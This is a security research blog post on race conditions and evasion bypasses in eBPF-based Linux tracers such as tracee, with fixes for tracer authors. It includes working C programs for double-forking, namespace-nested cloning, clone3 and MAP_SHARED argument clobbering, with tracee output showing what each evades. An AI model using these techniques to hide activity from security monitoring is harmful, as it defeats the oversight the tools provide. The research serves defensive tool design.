Having been in the game of auditing kprobe-based tracers for the past couple of years, and in light of this upcoming DEF CON on eBPF tracer race conditions (which you should go watch) being given by a friend of mine from the NYU(-Poly) (OSIR)IS(IS) lab, I figured I would wax poetic on some of the more amusing issues that tracee, Aqua Security’s “Runtime Security and Forensics” framework for Linux, used to have and other general issues that anyone attempting to write a production-ready tracer should be aware of. These come up frequently whenever we’re looking at Linux tracers. This post assumes some familiarity with writing eBPF-based tracing tools, if you haven’t played with eBPF yet, consider poking around your kernel and system processes with bpftrace or bcc.
tl;dr In this post, we discuss an insecure coding pattern commonly used in system observability and program analysis tools, and several techniques that can enable one to evade observation from such tools using that pattern, especially when they are being used for security event analysis. We also discuss several ways in which such software can be written that do not enable such evasion, and the current limitations that make it more difficult than necessary to write such code correctly.
As we’ve mentioned before,1 one does not simply trace fork(2)
or clone(2)
because the child process is actually started (from a CoW snapshot of the caller process) before the syscall has actually returned to the caller. To do so would be a problem, as any tracer that waits for the return value of fork(2)
/clone(2)
/etc. to start watching the PID will invariably lose some of the initial operations of the child >99% of the time. While this is not a “problem” for most applications’ behavior, it becomes troublesome for monitoring systems based on following individual process hierarchies live instead of all processes globally, retroactively, as anyone can simply “double-fork” in rapid succession to throw off the yoke of inspection, since the second fork(2)
will be missed ~100% of the time (even when implementing the bypass in C).
// $ gcc -std=c11 -Wall -Wextra -pedantic -o double-fork dobule-fork.c // $ ./double-fork <iterations> </path/to/binary> #include <stdlib.h> #include <stdio.h> #include <sys/types.h> #include <unistd.h> int main(int argc, char** argv, char** envp) { if (argc < 3) { return 1; } int loop = atoi(argv[1]); for (int i=0; i < loop; i++) { pid_t p = fork(); if (p != 0) { return 0; } } return execve(argv[2], &argv[2], envp); }
/tracee/dockerer/tracee.main/dist # ./tracee --trace process:follow --filter pid=48478 -e execve -e clone TIME(s) UID COMM PID TID RET EVENT ARGS 111506.067379 0 bash 0 0 50586 clone flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F56929630BF, tls: 0 111506.069569 0 bash 0 0 0 execve pathname: ./double-fork, argv: [./double-fork 100 /usr/bin/id] 111506.077553 0 double-fork 0 0 50590 clone flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7FF0153690BF, tls: 0 111506.079220 0 double-fork 0 0 50592 clone flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7FF0153690BF, tls: 0 ... 111506.142778 0 double-fork 0 0 50690 clone flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7FF0153690BF, tls: 0 111506.143236 0 double-fork 0 0 0 execve pathname: /usr/bin/id, argv: [/usr/bin/id] ... 111514.289461 0 bash 0 0 50699 clone flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F56929630BF, tls: 0 111514.293312 0 bash 0 0 0 execve pathname: ./double-fork, argv: [./double-fork 100 /usr/bin/id] 111514.303955 0 double-fork 0 0 50700 clone flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F9CF46280BF, tls: 0 111514.304240 0 double-fork 0 0 50701 clone flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F9CF46280BF, tls: 0 ... 111514.356522 0 double-fork 0 0 50799 clone flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F9CF46280BF, tls: 0 111514.356949 0 double-fork 0 0 0 execve pathname: /usr/bin/id, argv: [/usr/bin/id] ... 111519.410500 0 double-fork 0 0 50836 clone flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F533D0A10BF, tls: 0 111519.411117 0 double-fork 0 0 50837 clone flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F533D0A10BF, tls: 0
The start of child execution is triggered from the wake_up_new_task()
function called by _do_fork()
(now kernel_clone()
), which is the internal kernel function powering all of the fork(2)
/clone(2)
alikes.
pid_t kernel_clone(struct kernel_clone_args *args) { ... /* * Do this prior waking up the new thread - the thread pointer * might get invalid after that point, if the thread exits quickly. */ trace_sched_process_fork(current, p); pid = get_task_pid(p, PIDTYPE_PID); nr = pid_vnr(pid); if (clone_flags & CLONE_PARENT_SETTID) put_user(nr, args->parent_tid); if (clone_flags & CLONE_VFORK) { p->vfork_done = &vfork; init_completion(&vfork); get_task_struct(p); } wake_up_new_task(p); ...
In our talk (slides 24-25), we gave a bpftrace example of a fork-exec tracer that would not lose to race conditions.
kprobe:wake_up_new_task { $chld_pid= ((structtask_struct*)arg0)->pid; @pids[$chld_pid]= nsecs; } tracepoint:syscalls:sys_enter_execve { if (@pids[pid]){ $time_diff= ((nsecs-@pids[pid]) / 1000000); if($time_diff<= 10){ printf("%s => ",comm); join(args->argv); } } delete(@pids[pid]); }
In general, we prefer to hook wake_up_new_task()
with a kprobe since it’s fairly stable and gives raw access to the entire fully-configured child struct task_struct*
right before it is started. However, if one does not care about other metadata accessible from that pointer, nor need it to be fully initialized (i.e. if they just want the PID), they can hook the sched_process_fork
tracepoint event, which is triggered by the trace_sched_process_fork(current, p)
call shown above. This is what tracee currently opts to do as of commit 8c944cf07f15045f395f7754f92b7809316c681c/tag v0.5.4.
Additionally, the problems of tracing the fork(2)
/clone(2)
/etc. syscalls directly led to (and lead to in any tracers not hooking wake_up_new_task
/sched_process_fork
) other issues that can present bypasses in the scenario of live child process observation.
The most interesting of these issues is that fork(2)
/clone(2)
/etc. return PIDs within the context of the PID namespace of the process (thread). As a result, the return values of these syscalls cannot meaningfully be used by a kernel-level tracer without also accounting for child pidns PID to host PID mappings. In distros that allow unprivileged user namespaces to be created, this allows arbitrary process to create nested PID namespaces by first creating a nested user namespace. This can be done in a number of ways, such as via unshare(2)
, setns(2)
, or even clone(2)
with CLONE_NEWUSER
and CLONE_NEWPID
.
root@box:~# su -s /bin/bash nobody nobody@boc:/root$ unshare -Urpf --mount-proc root@box:/root# nano & [1] 18 root@box:/root# ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.1 0.0 8264 5156 pts/0 S 01:37 0:00 -bash root 17 0.0 0.0 7108 4132 pts/0 T 01:38 0:00 nano root 18 0.0 0.0 8892 3344 pts/0 R+ 01:38 0:00 ps aux root@box:/root# unshare -pf --mount-proc root@box:/root# ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 1.2 0.0 8264 5200 pts/0 S 01:38 0:00 -bash root 15 0.0 0.0 8892 3332 pts/0 R+ 01:38 0:00 ps aux
// $ gcc -std=c11 -Wall -Wextra -pedantic -o userns-clone-fork userns-clone-fork.c // $ ./userns-clone-fork </path/to/binary> #define _GNU_SOURCE #include <sched.h> #include <stdlib.h> #include <stdio.h> #include <sys/types.h> #include <unistd.h> int clone_child(void *arg) { char** argv = (char**)arg; printf("clone pid: %u\n", getpid()); pid_t p = fork(); if (p != 0) { return 0; } printf("fork pid: %u\n", getpid()); return execve(argv[1], &argv[1], NULL); } static char stack[1024*1024]; int main(int argc, char **argv) { if (argc < 2) { return 1; } printf("parent pid: %u\n", getpid()); pid_t p = clone(clone_child, &stack[sizeof(stack)], CLONE_NEWUSER|CLONE_NEWPID, argv); if (p == -1) { perror("clone"); exit(1); } return 0; }
/tracee/dockerer/tracee.main/dist # ./tracee --trace process:follow --filter pid=54519 -e execve -e clone TIME(s) UID COMM PID TID RET EVENT ARGS 117174.563477 0 bash 0 0 55395 clone flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F99617200BF, tls: 0 117174.566597 0 bash 0 0 0 execve pathname: ./userns-clone-fork, argv: [./userns-clone-fork /usr/bin/id] 117174.578037 0 userns-clone-fo 0 0 55396 clone flags: CLONE_NEWUSER|CLONE_NEWPID, stack: 0x5621B2DBB030, parent_tid: 0x0, child_tid: 0x7F7C130B6285, tls: 18 117174.579600 0 userns-clone-fo 0 0 2 clone flags: CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID, stack: 0x0, parent_tid: 0x0, child_tid: 0x7F7C1307A0BF, tls: 0
However, more interestingly, this means that such tracers will not work by default on containers unless the containers run within the host PID namespace, a dangerous configuration. This was the behavior we observed with tracee prior to the aforementioned commit 8c944cf07f15045f395f7754f92b7809316c681c.
Prior to tracee 0.5.4, fork(2)
/clone(2)
-alike syscall PID return value processing was handled with the following code:
SEC("raw_tracepoint/sys_exit") int tracepoint__raw_syscalls__sys_exit(struct bpf_raw_tracepoint_args *ctx) { long ret = ctx->args[1]; struct task_struct *task = (struct task_struct *)bpf_get_current_task(); struct pt_regs *regs = (struct pt_regs*)ctx->args[0]; int id = READ_KERN(regs->orig_ax); ... // fork events may add new pids to the traced pids set // perform this check after should_trace() to only add forked childs of a traced parent if (id == SYS_CLONE || id == SYS_FORK || id == SYS_VFORK) { u32 pid = ret; bpf_map_update_elem(&traced_pids_map, &pid, &pid, BPF_ANY); if (get_config(CONFIG_NEW_PID_FILTER)) { bpf_map_update_elem(&new_pids_map, &pid, &pid, BPF_ANY); } }
In the above snippet, the syscall ID is compared against those of clone(2)
, fork(2)
, and vfork(2)
. However, the syscall is not compared against the ID of clone3(2)
. While tracee does separately log clone3(2)
events (since commit f44eb206bf8e80efeb1da68641cb61f3f00c522c/tag v0.4.0), the above omission resulted in clone3(2)
-created child process not being followed prior to commit 8c944cf07f15045f395f7754f92b7809316c681c.
// $ gcc -std=c11 -Wall -Wextra -pedantic -o clone3 clone3.c // $ ./clone3 </path/to/binary> #define _GNU_SOURCE #include <sched.h> #include <linux/sched.h> #include <linux/types.h> #include <stdlib.h> #include <stdint.h> #include <stdio.h> #include <sys/types.h> #include <unistd.h> #include <sys/syscall.h> int clone_child(void *arg) { char** argv = (char**)arg; return execve(argv[1], &argv[1], NULL); } int main(int argc, char **argv) { if (argc < 2) { return 1; } printf("parent pid: %u\n", getpid()); struct clone_args args = {0}; pid_t p = syscall(__NR_clone3, &args, sizeof(struct clone_args)); if (p == -1) { perror("clone3"); return 1; } if (p != 0) { printf("clone pid: %u\n", p); } else { clone_child(argv); } return 0; }
Since that commit, which introduces the change to use sched_process_fork
, tracee now obtains both the host PID and in-namespace PID:
SEC("raw_tracepoint/sched_process_fork") int tracepoint__sched__sched_process_fork(struct bpf_raw_tracepoint_args *ctx) { // Note: we don't place should_trace() here so we can keep track of the cgroups in the system struct task_struct *parent = (struct task_struct*)ctx->args[0]; struct task_struct *child = (struct task_struct*)ctx->args[1]; int parent_pid = get_task_host_pid(parent); int child_pid = get_task_host_pid(child); ... if (event_chosen(SCHED_PROCESS_FORK) && should_trace()) { ... int parent_ns_pid = get_task_ns_pid(parent); int child_ns_pid = get_task_ns_pid(child); save_to_submit_buf(submit_p, (void*)&parent_pid, sizeof(int), INT_T, DEC_ARG(0, *tags)); save_to_submit_buf(submit_p, (void*)&parent_ns_pid, sizeof(int), INT_T, DEC_ARG(1, *tags)); save_to_submit_buf(submit_p, (void*)&child_pid, sizeof(int), INT_T, DEC_ARG(2, *tags)); save_to_submit_buf(submit_p, (void*)&child_ns_pid, sizeof(int), INT_T, DEC_ARG(3, *tags)); events_perf_submit(ctx); } return 0; }
In our CCC talk23, we discussed how there exists a significant time-of-check-to-time-of-use (TOCTTOU) race condition when hooking a syscall entrypoint (e.g. via a kprobe, but also more generally) as userland-supplied data that is copied/processed by the hook may change by the time the kernel accesses as part of the syscall’s implementation.
The main way to get around this issue is to hook internal kernel functions, tracepoints, or LSM hooks to access syscall inputs after they have already been copied into kernel memory (and probe the in-kernel version). However, this approach is not universally applicable and only works in the presence of such internal anchor points. Instead, one has to rely on the Linux Auditing System (aka auditd
), which, in addition to simple raw syscall argument dumps, has its calls directly interleaved within the kernel’s codebase to process and log inputs after they have been copied from user memory for processing by the kernel. auditd’s calls are very carefully (read: fragilely) placed to ensure that values used for filtering and logging are not subject to race conditions, even in the cases where data is being read from user memory.
For example, auditd’s execve(2)
logging takes the following form for a simple ls -lht /
:
type=EXECVE msg=audit(...): argc=4 a0="ls" a1="--color=auto" a2="-lht" a3="/"
This log line is generated by audit_log_execve_info()
from apparent userspace memory:
const char __user *p = (const char __user *)current->mm->arg_start; ... len_tmp = strncpy_from_user(&buf_head[len_buf], p, len_max - len_buf);
However, we can observe that the execve(2)
argument handling of auditd is “safe” with the following bpftrace script which hooks some of the functions called during an execve(2)
syscall that have symbols:
kprobe:__audit_bprm { printf("__audit_bprm called\n"); } kprobe:setup_arg_pages { printf("setup_arg_pages called\n") } kprobe:do_open_execat { printf("do_open_execat called\n"); } kprobe:open_exec { printf("open_exec(\"%s\") called\n", str(arg0)); } kprobe:security_bprm_creds_for_exec { printf("security_bprm_creds_for_exec called\n"); }
# bpftrace trace.bt Attaching 5 probes... do_open_execat called security_bprm_creds_for_exec called open_exec("/lib64/ld-linux-x86-64.so.2") called do_open_execat called setup_arg_pages called __audit_bprm called
The first do_open_execat()
call is that from bprm_execve()
, which is called from do_execveat_common()
, right after argv is copied into the struct linux_binprm
. setup_arg_pages
is called from within a struct linux_binfmt
implementation and sets current->mm->arg_start
to bprm->p
. And then lastly, __audit_bprm()
is called (from exec_binprm()
, itself called from bprm_execve()
), which sets the auditd context type to AUDIT_EXECVE
, resulting in audit_log_execve_info()
being called from audit_log_exit()
(via show_special()
) to generate the above type=EXECVE
log line.
It goes without saying that this is not really something that eBPF code could hope to do in any sort of stable manner. One could try to use eBPF to hook a bunch of the auditd related functions in the kernel, but that probably isn’t very stable either and any such code would essentially need to re-implement just the useful parts of auditd that extract inputs, process state, and system state, and not the cruft (slow filters, string formatting, and who knows what else) that results in auditd somehow having a syscall overhead upwards of 245%.4
Instead of trying to hook onto __audit_*
symbols called only when auditd is enabled, we should probably try to find relevant functions or tracepoints in the same context to latch onto, such as trace_sched_process_exec
in the case of execve(2)
.
static int exec_binprm(struct linux_binprm *bprm) { ... audit_bprm(bprm); trace_sched_process_exec(current, old_pid, bprm); ptrace_event(PTRACE_EVENT_EXEC, old_vpid); proc_exec_connector(current); return 0; }
As it turns out, trace_sched_process_exec
is even more necessary than one might initially think. While race conditions when hooking syscalls via kprobes and tracepoints are troublesome, it turns out that userspace can flat out block eBPF from reading syscall inputs if they reside in MAP_SHARED
pages. It is worth noting that such tomfoolery is somewhat limited as it only works against bpf_probe_read(|_user|_kern)
calls made before a page is read by the kernel in a given syscall handler. As a result, a quick “fix” for tracers is to perform such reads when the syscall returns. However, such a “fix” would increase the feasibility of race condition abuse whenever the syscall implementation takes longer than the syscall context switch.
Given that this limitation doesn’t appear to be that well known, it could be a bug in the kernel, but it only presents an issue when one is already writing their eBPF tracers in the wrong manner. tracee is not generally vulnerable to MAP_SHARED
abuse because it mostly dumps syscall arguments from a raw tracepoint hook on sys_exit
. However, for syscalls that don’t normally return, such as execve(2)
, it resorts to dumping the arguments in its sys_enter
raw tracepoint hook, enabling the syscall event to be fooled. Regardless, this is also not an issue for tracee as it implements a hook for the sched_process_exec
tracepoint as of commit 6166346e7479bc3b4b417a67a92a2493a30b949e/tag v0.6.0.
// $ gcc -std=c11 -Wall -Wextra -pedantic -o clobber clobber.c -lpthread #define _GNU_SOURCE #include <stdlib.h> #include <stdio.h> #include <string.h> #include <stdint.h> #include <unistd.h> #include <fcntl.h> #include <sys/mman.h> #include <pthread.h> static char* checker; static char* key; static int mode = 1; //force byte by byte copies void yoloncpy(volatile char* dst, volatile char* src, size_t n, int r) { if (r == 0) { for (size_t i = 0; i < n; i++) { dst[i] = src[i]; } } else { for (size_t i = n; i > 0; i--) { dst[i-1] = src[i-1]; } } } void* thread1(void* arg) { int rev = (int)(uintptr_t)arg; uint64_t c = 0; while(1) {//c < 8192) { switch (c%2) { case 0: { yoloncpy(key, "supergood", 10, rev); break; } case 1: { yoloncpy(key, "reallybad", 10, rev); break; } } c += 1; } return NULL; } void* thread2(void* arg) { (void)arg; uint64_t c = 0; while(1) { switch (c%2) { case 0: { memcpy(key, "supergood", 10); break; } case 1: { memcpy(key, "reallybad", 10); break; } } c += 1; } return NULL; } int main(int argc, char** argv, char** envp) { if (argc < 2) { printf("usage: %s <count> [mode]\n", argv[0]); return 1; } int count = atoi(argv[1]); if (argc >= 3) { mode = atoi(argv[2]); if (mode != 1 && mode != 2) { printf("invalid mode: %s\n", argv[2]); return 1; } } key = mmap(NULL, 32, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0); if (key == NULL) { perror("mmap"); return 1; } checker = mmap(NULL, 32, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0); if (checker == NULL) { perror("mmap2"); return 1; } strcpy(key, "supergood"); strcpy(checker, "./checker"); char count_str[32] = "0"; char* nargv[] = {checker, key, count_str, NULL}; pthread_t t_a; pthread_t t_b; if (mode == 1) { pthread_create(&t_a, NULL, &thread1, (void*)0); pthread_create(&t_b, NULL, &thread1, (void*)1); } else if (mode == 1) { pthread_create(&t_a, NULL, &thread2, NULL); } int c = 0; while(c < count) { snprintf(count_str, sizeof(count_str), "%d", c); int r = fork(); if (r == 0) { int fd = open(key, 0); if (fd >= 0) { close(fd); } execve(checker, nargv, envp); } else { sleep(1); } c += 1; } return 0; }
# ./dist/tracee-ebpf --trace event=execve,sched_process_exec UID COMM PID TID RET EVENT ARGS 0 bash 7662 7662 0 execve pathname: ./clobber, argv: [./clobber 5] 0 clobber 7662 7662 0 sched_process_exec cmdpath: ./clobber, pathname: /root/clobber, argv: [./clobber 5], dev: 264241153, inode: 5391, invoked_from_kernel: 0 0 clobber 7665 7665 0 execve argv: [] 0 checker 7665 7665 0 sched_process_exec cmdpath: ./checker, pathname: /root/checker, argv: [./checker rupergood 0], dev: 264241153, inode: 5393, invoked_from_kernel: 0 0 clobber 7666 7666 0 execve argv: [] 0 checker 7666 7666 0 sched_process_exec cmdpath: ./checker, pathname: /root/checker, argv: [./checker reallybad 1], dev: 264241153, inode: 5393, invoked_from_kernel: 0 0 clobber 7667 7667 0 execve argv: [] 0 checker 7667 7667 0 sched_process_exec cmdpath: ./checker, pathname: /root/checker, argv: [./checker supergood 2], dev: 264241153, inode: 5393, invoked_from_kernel: 0 0 clobber 7668 7668 0 execve argv: [] 0 checker 7668 7668 0 sched_process_exec cmdpath: ./checker, pathname: /root/checker, argv: [./checker supergbad 3], dev: 264241153, inode: 5393, invoked_from_kernel: 0 0 clobber 7669 7669 0 execve argv: [] 0 checker 7669 7669 0 sched_process_exec cmdpath: ./checker, pathname: /root/checker, argv: [./checker reallgood 4], dev: 264241153, inode: 5393, invoked_from_kernel: 0
Note: Interestingly enough, I only stumbled across this behavior because it would have been less effective to use in-process threads to clobber inputs to execve(2)
since it kills all other threads than the one issuing the syscall. The open()
call above exists primarily to trigger an example for the below test code to show how probes from sys_enter
fail (with error -14, bad address), but succeed in in the sys_exit
hook.
SEC("raw_tracepoint/sys_enter") int sys_enter_hook(struct bpf_raw_tracepoint_args *ctx) { struct pt_regs _regs; bpf_probe_read(&_regs, sizeof(_regs), (void*)ctx->args[0]); int id = _regs.orig_ax; char buf[128]; if (id == 257) { char* const pathname = (char* const)_regs.si; bpf_printk("sys_enter -> openat %p\n", pathname); bpf_probe_read_str(buf, sizeof(buf), (void*)pathname); bpf_printk("sys_enter -> openat %s\n", buf); } else if (id == 59) { char* const f = (char* const)_regs.di; bpf_printk("sys_exit -> execve %p\n", f); bpf_probe_read_str(buf, sizeof(buf), (void*)f); bpf_printk("sys_exit -> execve %s\n", buf); } return 0; } SEC("raw_tracepoint/sys_exit") int sys_exit_hook(struct bpf_raw_tracepoint_args *ctx) { struct pt_regs _regs; bpf_probe_read(&_regs, sizeof(_regs), (void*)ctx->args[0]); int id = _regs.orig_ax; char buf[128]; if (id == 257) { char* const pathname = (char* const)_regs.si; bpf_printk("sys_exit -> openat %p\n", pathname); bpf_probe_read_str(buf, sizeof(buf), (void*)pathname); bpf_printk("sys_exit -> openat %s\n", buf); } else if (id == 59) { char* const f = (char* const)_regs.di; bpf_printk("sys_exit -> execve %p\n", f); bpf_probe_read_str(buf, sizeof(buf), (void*)f); bpf_printk("sys_exit -> execve %s\n", buf); } return 0; }
# cat /sys/kernel/tracing/trace_pipe ... <...>-215084 [000] .... 2266209.468617: 0: sys_enter -> openat 000000005ec00ae4 <...>-215084 [000] .N.. 2266209.468645: 0: sys_enter -> openat <...>-215084 [000] .... 2266209.469091: 0: sys_exit -> openat 000000005ec00ae4 <...>-215084 [000] .N.. 2266209.469114: 0: sys_exit -> openat supelybad <...>-215084 [000] .... 2266209.469199: 0: sys_exit -> execve 0000000031d15ade <...>-215084 [000] .N.. 2266209.469222: 0: sys_exit -> execve <...>-215084 [000] .... 2266209.470178: 0: sys_exit -> execve 0000000000000000 <...>-215084 [000] .N.. 2266209.470224: 0: sys_exit -> execve <...>-215084 [000] .... 2266209.472093: 0: sys_enter -> openat 000000008edac6ac <...>-215084 [000] .N.. 2266209.472138: 0: sys_enter -> openat /etc/ld.so.cache <...>-215084 [000] .... 2266209.472205: 0: sys_exit -> openat 000000008edac6ac <...>-215084 [000] .N.. 2266209.472248: 0: sys_exit -> openat /etc/ld.so.cache <...>-215084 [000] .... 2266209.472345: 0: sys_enter -> openat 000000007671a9c9 <...>-215084 [000] .N.. 2266209.472366: 0: sys_enter -> openat /lib/x86_64-linux-gnu/libc.so.6 <...>-215084 [000] .... 2266209.472420: 0: sys_exit -> openat 000000007671a9c9 <...>-215084 [000] .N.. 2266209.472440: 0: sys_exit -> openat /lib/x86_64-linux-gnu/libc.so.6 ...
If you want accurate tracing for syscall events, you probably shouldn’t be hooking the actual syscalls, and especially not the syscall tracepoints. Instead, your only real option is to figure out how to dump the arguments from the internals of a given syscall implementation. Depending on if there are proper hook-points (e.g. tracepoints, LSM hooks, etc.) or not — and if they provide access to all arguments — it may be necessary to hook internal kernel functions with kprobes for absolute correctness, if it is at all possible in the first place. For what it’s worth, this is mostly a problem with Linux itself and not something that kprobe-ing kernel modules can fix; though they can properly handle kernel structs beyond basic complexity, unlike eBPF.
In the case of security event auditing, correctness supersedes ease of development, but vendors may not be making that choice, at least not initially. Due to this, auditors must be aware of how their analysis tools actually work and how (and from where) they source event information, so that they can treat the output with a sizable hunk of salt where necessary because, while the tools are likely not lying, they may not be not capable of telling the truth either.
Olsen, Andy. “Fast and Easy pTracing with eBPF (and not ptrace)” NCC Group Open Forum, NCC Group, September 2019, New York, NY. Presentation.↩︎
Dileo, Jeff; Olsen, Andy. “Kernel Tracing With eBPF: Unlocking God Mode on Linux” 35th Chaos Communication Congress (35C3), Chaos Computer Club (CCC), 30 December 2018, Leipziger Messe, Leipzig, Germany. Conference Presentation.↩︎
https://capsule8.com/blog/auditd-what-is-the-linux-auditing-system/↩︎